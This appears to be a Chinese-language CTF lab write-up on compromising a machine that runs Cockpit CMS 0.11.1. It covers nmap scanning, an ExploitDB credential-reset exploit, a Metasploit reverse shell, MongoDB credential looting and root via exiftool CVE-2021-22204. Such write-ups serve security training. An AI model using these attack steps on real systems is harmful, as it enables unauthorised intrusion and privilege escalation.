端口扫描

nmap --min-rate=10000 -p- 10.10.239.126
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:49 UTC
Nmap scan report for ip-10-10-239-126.eu-west-1.compute.internal (10.10.239.126)
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:11:25:0E:D4:A9 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds
nmap -sV -sC -sT -O -p22,80 10.10.239.126
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:49 UTC
Nmap scan report for ip-10-10-239-126.eu-west-1.compute.internal (10.10.239.126)
Host is up (0.00045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f25f9402325cd298b28a9d982f549e4 (RSA)
|   256 0af429ed554319e773a7097930a8491b (ECDSA)
|_  256 2f43ada3d15b648633075d94f9dca401 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
MAC Address: 02:11:25:0E:D4:A9 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

Getshell

访问看到是一个叫做cockpit的CMS,右键查看源码,发现一行,得到版本号为0.11.1

<link href="/assets/app/css/style.css?ver=0.11.1" type="text/css" rel="stylesheet">
locate multiple/webapps/50185.py
cp /usr/share/exploitdb/exploits/multiple/webapps/50185.py .
python 50185.py

重置skidy和admin用户的凭证

     Username : skidy 
     Password : p|x,ku=o`,

Username : admin 
Password : ]N()#P6|b_

登录之后稍微查看了一下,有一个文件上传点,但是没有尝试。尝试msf一把梭

search cockpit

use 0

set USER admin

set RHOSTS 靶机IP

set LHOST tun0

set LPORT 443

run

能够拿到shell

横向

根据房间提示,查询mongoDB数据库,一开始查询数据库的指令输错了md找不到数据库

show dbs
shshow dbs
admin         (empty)
dbdb          (empty)
local         0.078GB
sudousersbak  0.078GB
test          (empty)
use sudousersbak
show collections
db.flag.find().pretty()

得到数据库flag,查询user集合,得到stux用户的密码,并且转移

> db.user.find().pretty()
dbdb.user.find().pretty()
{
        "_id" : ObjectId("60a89d0caadffb0ea68915f9"),
        "name" : "p4ssw0rdhack3d!123"
}
{ "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" }

提权

sudo -l

发现能以root身份运行exiftool,能够写入任意文件到任意目录,虽然可以直接将root.txt写入到任意目录来读取,但房间的目的还是让我们来提权。

查看版本是12.05,存在CVE-2021-22204可以执行任意命令

在寻找了非常多的exp之后,遇到了许多问题,找到一个输入命令来生成jpg文件的。

https://github.com/se162xg/CVE-2021-22204/blob/main/craft_a_djvu_exploit.sh

转移到靶机上

bash exp.sh 'sudo su'
sudo /usr/local/bin/exiftool delicate.jpg

运行然后我们是root